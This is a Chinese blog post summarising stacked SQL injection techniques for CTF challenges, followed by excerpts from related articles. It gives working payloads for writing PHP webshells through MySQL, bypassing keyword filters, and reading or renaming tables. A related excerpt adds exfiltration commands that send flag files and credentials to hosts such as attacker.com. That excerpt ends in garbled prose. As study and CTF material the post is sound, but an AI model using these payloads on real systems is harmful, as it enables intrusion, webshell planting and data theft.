CTF——sql注入之堆叠注入整理

已于 2022-04-18 20:45:27 修改
阅读量5.8k 收藏 5
点赞数 2
分类专栏: ctf总结 文章标签: 网络安全 sql
于 2022-03-04 22:09:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_51735061/article/details/123286401
版权
本文详细介绍了SQL堆叠注入的概念,包括如何利用分号;执行多条恶意语句,以及常见的解题思路,如使用RENAME、ALTER TABLE等。还提到了预处理语句作为绕过过滤的方法,并提供了具体的payload示例。此外,讨论了在无法使用SELECT时,如何借助HANDLER语句来获取数据。最后,强调了防御堆叠注入的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

堆叠注入

介绍

MySQL可以执行多条语句,多条语句之前用;做分隔。 简单的说,由于分号;为MYSQL语句的结束符。若在支持多语句执行的情况下,可利用此方法 执行其他恶意语句,如RENAME、DROP等,堆叠注入可以用于执行任何SQL语句

注意,通常多语句执行时,若前条语句已返回数据,则之后的语句返回的数据通常无法返 回前端页面。建议使用union联合注入,若无法使用联合注入, 可考虑使用RENAME关键 字,将想要的数据列名/表名更改成返回数据的SQL语句所定义的表/列名

常见解题思路

常规查询

直接用查询语句查,不过这种题基本上不会出的。一般堆叠注入都会过滤很多的关键词。

写后门
#payload1
select "<?php phpinfo();?>" into outfile "/tmp/1.php";
#payload2
select "<?php phpinfo();?>" into dumpfile "/tmp/1.php";
#payload3(secure_file_pric为NULL无法写入文件时用)
set global general_log=on;
set global general_log_file='C:/phpStudy/WWW/789.php';
select '<?php eval($_POST['a']) ?>';

过滤select时的解法

/*
mysql除可使用select查询表中的数据,也可使用handler语句,这条语句使我们能够一
行一行的浏览一个表中的数据,不过handler语句并不具备select语句的所有功能。它是
mysql专用的语句,并没有包含到SQL标准中
*/
handler users open as hd; #指定数据表进行载入并将返回句柄重命名
handler hd read first; #读取指定表/句柄的首行数据
handler hd read next; #读取指定表/句柄的下一行数据
handler hd close; #关闭句柄

改变表名使得直接显示flag

RENAME TABLE `words` TO `words2`;
RENAME TABLE `1919810931114514` TO `words`;
ALTER TABLE `words` CHANGE `flag` `id` VARCHAR(100) CHARACTER SET 
utf8 COLLATE utf8_general_ci NOT NULL;#

Mysql预处理

预处理有个好处,那就是可以把一些关键词通过concat给预处理来进行绕过。

PREPARE st from concat('s','elect', ' * from `1919810931114514` ');
EXECUTE st;#
Stached injection -- 堆叠注入
RuoLi_s的博客
12-30 301
Stached injection – 堆叠注入 原文链接请点击:https://www.cnblogs.com/ruoli-s/p/14208908.html 0x00 堆叠注入的定义 ​ Stacked injection 汉语翻译过来后,称 为堆查询注入,也有称之为堆叠注入堆叠注入为攻击者提供了很多的攻击手段,通过添加一个新的查询或者终止查询,可以达到修改数据和调用存储过程的目的。 0x01 堆叠注入的原理 ​ 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql
30、WEB攻防——通用漏洞&SQL注入&CTF&二次&堆叠&DNS带外
qq_55202378的博客
01-21 599
假如在注册用户的时候,需要填用户名、邮箱和密码,登录使用邮箱和密码,登陆上去后会显示用户名,后台为什么知道你的用户名,就可能是使用SQL语句,通过你的邮箱和密码查询到用户名。假如用户名是SQL语句,会在插入的时候就执行SQL语句,然后显示。这就是二次注入的基本原理。应用程序:解决不回显、反向连接(DNS协议一般不被禁用)、SQL注入、命令执行、SSRF等。这个函数),某k真辣鸡,整这么些花里胡哨的。填写表单,保存数据默认会更新所有数据。在mysql中,支持16进制编码。
CTF堆叠注入
weixin_48691188的博客
03-05 492
比如phpmysqli_multi_query()函数,这个函数在支持同时执行多条sql语句,而与之对应的mysqli_query()函数一次只能执行一条sql语句,所以要想目标存在堆叠注入,在目标主机没有对堆叠注入进行黑名单过滤的情况下必须存在类似于mysqli_multi_query()这样的函数。插入数据到student表:insert into student(id,name,score) values(1,"toert","100"),(2,"giao","10");
ctfhow——web入门195~200(堆叠注入
最新发布
uwvwko的博客
04-23 668
row[0] 表示从数据库查询结果中提取的某一行的第一个字段值,我们可以使用 select 来设置 $row[0] 的值,再提交我们设置的 password 满足两者相等。我们已经知道了有个表叫ctfshow_user,故show tables里面一定有ctfshow_user,SHOW命令用于显示数据库中的元数据信息,例如数据库、表、列、索引等的信息。SHOW INDEX FROM table_name:显示指定表中的所有索引。SHOW TABLES:显示指定数据库中的所有表。
堆叠注入--攻防世界CTF赛题学习
weixin_52515588的博客
03-24 895
发现对关键字都进行了过滤,那么接下来想用常规思路得到数据是不可能了,就利用堆叠注入。可以确定用户输入的内容被带入到数据库中查询了,那么就可以确定这个位置有注入漏洞。在这里大家额外补充一下关于mysql中handler的知识点,我也是现查的。在这发现了flag,这里查询的时候注意一下,需要用``把表名括起来。堆叠注入的原理什么的一搜一大堆,我就不引用百度了,直接进入正题。在一次联系CTF赛题中才了解到堆叠注入,在这里简单介绍一下。接下来就是手工注入的常见思路,利用order by来猜列。
buuctf 堆叠注入
meiyouis的博客
05-08 246
来查看数据库,出现数据库。来查看表名,但是使用。题目显示文本输入框,尝试1’ and 1’=1’#而堆叠注入其实就是通过结束符来执行多条。起到连接符的作用,在正常的。,这条语句执行起来相当于。语句时就要使用结束符隔。语句的默认结束符是以。
一天一道CTF 第三天(堆叠注入改表名)
scrawman的博客
03-02 487
[强网杯 2019]随便注 今天的也是SQL注入,输入1'报错显示说明闭合符号是' 再随便试试-1’ union select 1,2,3 --+,回显return preg_match("/select|update|delete|drop|insert|where|\./i",$inject); preg_match本来的作用是一个匹配函数,也就是在我们输入的语句中查找是否存在select等关键词,i表示大小写不敏感,无法用大小写混搭来绕过。 在网上查了一下可以用堆叠注入,1';show databa
SQL注入之联合查询——ctf公开课笔记记录
m0_75196987的博客
04-18 608
SQL注入之联合查询——来自 长空实验室ctf新兵训练营。Sqli-labs靶场搭建以及做题wp将由我亲自实践并为大家呈现。
WEB入门——SQL注入(一)
HasntStartIsOver的博客
06-03 1502
简单的SQL注入
SQL注入-07】堆叠注入案例—以sqli-labs-less38为例
m0_64378913的博客
05-05 1115
目录1 堆叠注入概述1.1 定义1.2 与union联合查询注入的对比1.3 局限性2 堆叠注入案例—以sqli-labs-less38为例2.1 实验平台2.2 实验目标2.3 堆叠注入实验步骤2.3.1 注入前准备2.3.2 判断注入点及注入类型2.3.3 判断回显列数及回显位置2.3.4 union注入获取库名表名字段名2.3.5 堆叠注入3 总结参考文章 1 堆叠注入概述 1.1 定义 英文为 stacked injection。 在SQL数据库中,每条语句是以;分开的,堆叠注入就是一次性注入并执
SQL Injection8(堆叠注入)——强网杯2019随便注
热门推荐
kid的博客
05-28 2万+
SQL Injection8(堆叠注入)——强网杯2019随便注 前言 前面参加强网杯线上赛,亲身体验了一把ctf从入门到入土,从打ctf变成被ctf打… 这里结合里面的题来对里面的知识点进行一个学习总结 随便注是一道sql注入题,因为过滤规则十分强大,所以很难… 这里会用到堆叠注入的知识,堆叠注入前面有所了解,觉得并不难,所以也没练习过,但做这道题的时候就又些懵了。 堆叠注入原理 在SQL中,...
(buuctf随便注)堆叠注入
2301_79595769的博客
12-23 785
堆叠注入触发的条件很苛刻,因为堆叠注入原理就是通过结束符同时执行多条sql语句,这就需要服务器在访问数据端时使用的是可同时执行多条sql语句的方法,例如php中的mysqli_multi_query函数。这就比较头疼了,不过如果仔细观察的话,一开始过滤的并没有alert 和 rename,我们已经知道了words是用来回显内容的,所以思路就是:我们把1919810931114514这个表更改名字为words,并增加相应的字段,使之回显原1919810931114514这个表的内容里面。
[GYCTF2020]Blacklist 1堆叠注入
weixin_45577185的博客
07-20 170
答案链接 过滤了这么多,比强网杯过滤更加严格了 这里我们用到handler这个东西 HANDLER … OPEN语句打开一个表,使其可以使用后续HANDLER … READ语句访问,该表对象未被其他会话共享,并且在会话调用HANDLER … CLOSE或会话终止之前不会关闭 1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;# 堆叠注入小tips ...
堆叠注入进阶--(buuctf-随便注、GYCTF-black_list)【多方法详解】
bin789456的博客
08-14 295
了解一下 堆叠注入基础知识及其他题目: 【】 Buuctf-随便注 算是堆叠注入中非常经典的题目了。 随便试试就能看到黑名单: 没了select,其实大概率就是堆叠注入 先探测一下: 1';show databases;# 应该就是了。 再看看表: 1';show tables;# 然后查看表的结构先找到flag的位置: 1';desc `1919810931114514`;# 注:在mysql中,数字作为名称都要带上`这个符号来使用,用show columns from `191981093
CTF [SUCTF 2019]EasySQL writeup 堆叠注入 | || *的使用
baynk的博客
04-01 2658
专挑注入的题先做。。。 0x01 干干干 给flag, 然后又试了',",-1等查找注入点的参数,发现存在整形注入,出现Nonono.都是被检测出来有过滤,于是去fuzz了下。 这些都是被过滤的,于是发现有个|和||没有被过滤,可以搞盲注,但是or被过滤了,information也连带着用不了,这玩意用不了常规的注入好像也没用,报错信息也关了,报错注入也用不了。于是又看前端的输出感觉像堆叠注...
BUUCTF-堆叠注入-文件包含
m0_64180167的博客
03-28 711
提示我们是include 文件包含打开环境点击我们include 尝试直接访问根目录 失败使用伪协议base64解密。
mysql堆叠注入条件,SQL注入堆叠注入(堆查询注入
weixin_39945816的博客
03-23 696
Stached injection -- 堆叠注入0x00 堆叠注入的定义​ Stackedinjection 汉语翻译过来后,称 为堆查询注入,也有称之为堆叠注入堆叠注入为攻击者提供了不少的攻击手段,经过添加一个新的查询或者终止查询,能够达到修改数据和调用存储过程的目的。前端0x01 堆叠注入的原理​ 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下咱们在;结束一个sql语...
BUUCTF-Web-随便注(堆叠注入)
m0_46315342的博客
08-12 434
这里转载一个大佬的博客: 作者:简简的我 链接:https://www.jianshu.com/p/36f0772f5ce8 来源:简书 然后我简单说一下这个题目吧,这是个sql注入的题目,过滤了select这样的关键字,双写和大小写以及空格都不能进行绕过,所以这里使用的是堆叠注入。 这个作者讲了三种方法,但是第三种好像有点难,第一种和第二种是比较容易接受的。主要是学习一下堆叠注入的语法吧,和sql有点点不一样。然后第二种方法里面作者还讲了一下预处理语句,感觉很牛逼。 ...
SQL注入进阶——堆叠注入
m0_69151365的博客
02-29 1996
我们最开始先进行常规注入,发现有报错,就考虑联合查询和报错注入,再发现select,update等都被waf过滤掉了,到这之后我们也没啥思路了, 我们去看了源码发现有multi_query()这个函数,我们就考虑了堆叠注入,完了之后就先查表数据,我们查到flag数据位919810931114514这个表中,我没想到的就是预编译,但是select、prepare、set、等都被waf过滤,源码可以发现预编译的关键词都可以使用大写来绕过,select绕不过去,于是我们就使用concat函数将进行拼接。
ctf中的数据外带
03-30
### CTF竞赛中的数据外带技术 #### 数据外带的概念 在CTF竞赛中,数据外带是指攻击者通过某种方式将目标服务器上的敏感信息传递到外部可控环境的过程。这种技术通常用于无回显漏洞场景下获取执行结果或验证命令是否成功运行。 --- #### 常见的数据外带技术和方法 1. **DNSLog工具** DNSLog是一种基于域名解析的日志记录工具,常用于捕获远程主机发起的DNS查询请求。它适用于无回显场景下的命令执行验证。当攻击者构造特定的payload时,可以通过触发DNS查询来实现数据外带[^4]。 2. **重定向与文件写入** 利用`>`、`>>`以及`tee`等Linux命令,可以将命令执行的结果保存至指定路径或将流量重定向到外部地址。例如,在某些RCE(Remote Code Execution)题目中,可通过以下方式完成数据外带: ```bash ping `whoami`.attacker.com ``` 上述命令会将当前用户名作为子域发送给`attacker.com`,从而达到泄露目的[^2]。 3. **CURL命令** 使用`curl`可以直接向外部接口发送GET/POST请求并携带参数。这种方法适合于需要传输较大规模数据的情况。例如: ```bash curl http://yourserver.com/data?result=$(cat /flag.txt) ``` 这里读取了`/flag.txt`的内容并通过HTTP GET请求将其上传到了自己的服务器上[^1]。 4. **SQL注入中的UNION SELECT联合查询** 对于存在SQL注入漏洞的应用程序来说,“堆叠查询”或者“联合查询”的技巧也可以用来实施数据外带操作。比如下面这个例子展示了如何把数据库表内的字段值拼接到URL后面形成新的链接指向攻击者的站点: ```sql UNION ALL SELECT null,null,'http://evil-site/'||username||'-'||password FROM users-- ``` 5. **其他协议利用** 除了上述提到的方式之外,还可以考虑FTP、SMTP等多种通信手段来进行信息转移;只要能够控制输入源就有可能找到合适的载体完成整个过程。 --- ### 实际案例分析 以NSSCTF为例说明具体应用情形:参赛选手需解决一道涉及命令注入的问题,其中给出了提示允许使用重定向机制解决问题。此时可以根据实际情况选用恰当的方法组合达成最终目标——即成功提取所需资料的同时规避检测风险[^3]。 --- ### 总结 综上所述,在参加CTF比赛期间遇到有关数据泄密类挑战项目时,应充分掌握各类基础技能包括但不限于编程语言特性理解程度高低不平等等因素影响效果表现差异明显所以要灵活运用各种资源寻找突破口进而顺利通关赢得胜利!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值